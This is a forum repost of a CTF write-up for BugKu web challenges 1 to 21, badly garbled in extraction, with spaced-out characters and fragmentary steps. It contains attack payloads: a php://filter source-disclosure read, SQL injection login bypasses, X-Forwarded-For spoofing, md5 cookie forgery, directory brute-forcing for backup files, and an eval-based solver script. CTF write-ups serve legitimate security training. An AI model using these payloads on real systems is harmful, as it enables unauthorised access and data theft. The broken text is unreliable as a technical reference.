搜索

[813] 2019-04-04_CTF论剑场Web1-Web21WriteUp

文档创建者:s7ckTeam
浏览次数:6
最后更新:2025-01-16
2019-04-04_CTF论剑场Web1-Web21WriteUp C T F W e b 1 - W e b 2 1   W r i t e U p 3 N D   B u g K u   2 0 1 9 - 0 4 - 0 4 3 N D   h t t p s : / / n e w . b u g k u . c o m w e b 1 e x t r a c t     t r i m     P a y l o a d : a = & b = f l a g { x x x x x x x }
w e b 2 P a y l o a d : w e b 3 < h t m l > < h e a d > < t i t l e > < / t i t l e > < / h e a d > < b o d y > < p > f l a g < b r / > 4 1 8 * 6 9 3 1 1 7 + 3 2 * ( 9 9 7 6 + 2 4 8 7 ) < / p > < f o r m   a c t i o n = " "   m e t h o d = " p o s t " > : < i n p u t   t y p e = " t e x t "   n a m e = " r e s u l t " / > < i n p u t   t y p e = " s u b m i t "   v a l u e = " " / > < / f o r m > < / b o d y > < / h t m l > i m p o r t   r e i m p o r t   r e q u e s t s u r l   =   ' h t t p : / / x x x x x x x x / ' =   r e q u e s t s . s e s s i o n ( ) t e x t   =   r . g e t ( u r l ) . t e x t c a l c   =   s t r ( r e . f i n d a l l ( " ( . * ? ) < / p > " ,   t e x t ) ) [ 2 : - 2 ] a n s   =   e v a l ( c a l c ) d a t a   =   { ' r e s u l t ' : a n s } r e s   =   r . p o s t ( u r l ,   d a t a ) p r i n t ( r e s . t e x t ) f l a g { x x x x x x x x x x }
p h p S o r r y , o n l y   P N G   f i l e s   a r e   a l l o w e d . u p l o a d - l a b s
, ~ :   p h p   使 p h p B a s e 6 4   d e c o d e w e b 4 u r l o p o p = h o m e o p = u p l o a d o p = 1 E r r o r n o s u c h   p a g e ? o p = p h p : / / f i l t e r / r e a d = c o n v e r t . b a s e 6 4 - e n c o d e / r e s o u r c e = f l a g P D 9 w a H A g C i R m b G F n P S J m b G F n e 2 U w M G Y 4 O T M x M D M 3 Y 2 J k Y j I 1 Z j Z i M W Q 4 M m R m Z T U 1 N T J m f S I 7 I A o / P g o = p h p   $ f l a g = " f l a g { x x x x x x x x x x x x x x x x } " ;  
P a y l o a d :   ,   p a s s w o r d f l a g { x x x x x x x x x x x x x x x } w e b 5 :   w e b 6 p a s s w o r d = '   o r   ' 1 ' = ' 1
I P 访 I P .   F i r e f o x X - F o r w a r d e d - F o r   H e a d e r / I n v a l i d   c r e d e n t i a l s !   P l e a s e   t r y   a g a i n ! F 1 2 5 0 2 3 b a s e 6 4 . d e c o d e . w e b 7 u s e r = a d m i n '   o r   ' 1 ' = ' 1 p a s s = '   o r   ' 1 ' = ' 1 X - F o r w a r d - F o r : 1 2 7 . 0 . 0 . 1 u s e r = a d m i n & p a s s = a d m i n u s e r = a m d i n & p a s s = 1 < ! - -   d G V z d D E y M w = =   - - > t e s t 1 2 3 T h e f l a g i s : x x x x x x x x x x x x x x x x x x x x
c o o k i e c o o k i e : h o m e . p h p
c o o k i e ~ w e b 8 S e t - C o o k i e :   u = 3 5 1 e 7 6 6 8 0 3 2 1 2 3 2 f 2 9 7 a 5 7 a 5 a 7 4 3 8 9 4 a 0 e 4 a 8 0 1 f c 3 S e t - C o o k i e :   r = 3 5 1 e 7 6 6 8 0 3 d 6 3 c 7 e d e 8 c b 1 e 1 c 8 d b 5 e 5 1 c 6 3 f d 4 7 c f f #   S e t - C o o k i e :   u = 3 5 1 e 7 6 6 8 0 3   2 1 2 3 2 f 2 9 7 a 5 7 a 5 a 7 4 3 8 9 4 a 0 e 4 a 8 0 1 f c 3 S e t - C o o k i e :   r = 3 5 1 e 7 6 6 8 0 3   d 6 3 c 7 e d e 8 c b 1 e 1 c 8 d b 5 e 5 1 c 6 3 f d 4 7 c f f #   m d 5 ( a d m i n ,   3 2 )   =   2 1 2 3 2 f 2 9 7 a 5 7 a 5 a 7 4 3 8 9 4 a 0 e 4 a 8 0 1 f c 3 #   d 6 3 c 7 e d e 8 c b 1 e 1 c 8 d b 5 e 5 1 c 6 3 f d 4 7 c f f     l i m i t e d

d i r s e a r c h / . i d e a / w o r k s p a c e . x m l w w w . t a r . g z
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理